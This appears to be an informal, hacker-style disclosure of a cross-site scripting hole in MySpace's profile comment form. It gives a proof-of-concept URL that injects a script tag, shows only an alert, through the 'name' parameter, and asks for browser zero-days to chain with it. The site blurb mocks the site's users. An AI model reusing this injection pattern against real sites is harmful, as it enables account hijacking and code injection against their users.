MySpace.com - XSS hole
----------------------
Desc: Theres' a XSS hole in MySpace.com
Risk: Medium to High (can be used to include malicious code)
Discovered by : dyn0 (codeslag{hat}gmail.com) http://0xdeadface.co.uk

Site blurb : Myspace.com is another one of those crappy community sites for
	     cam whores/scene kids/emo kids/goths/generic fools. If you haven't heard of
             then you must of been hiding under a rock for the past few years.

Hole description : The hole is in the add comment function, for this to work you
		   must be logged in and have a valid friendID.

Screenshot : http://0xdeadface.co.uk/myspace_xss.JPG

URL : http://www.myspace.com/index.cfm?fuseaction=user
      &circuitaction=viewProfile_commentForm&friendID=[7-char-friend-id]
      &name=%3Cscript%3Ealert(%220xdeadface%20owns%20you%22);%3C/script%3E

I have been able to confirm that this can be used for the inclusion of code (got any 0day IE exploits?)

Hugs & Kisses dyn0/codeslag

"When it came to throw brick through that starbucks window you left me all alone." - Against Me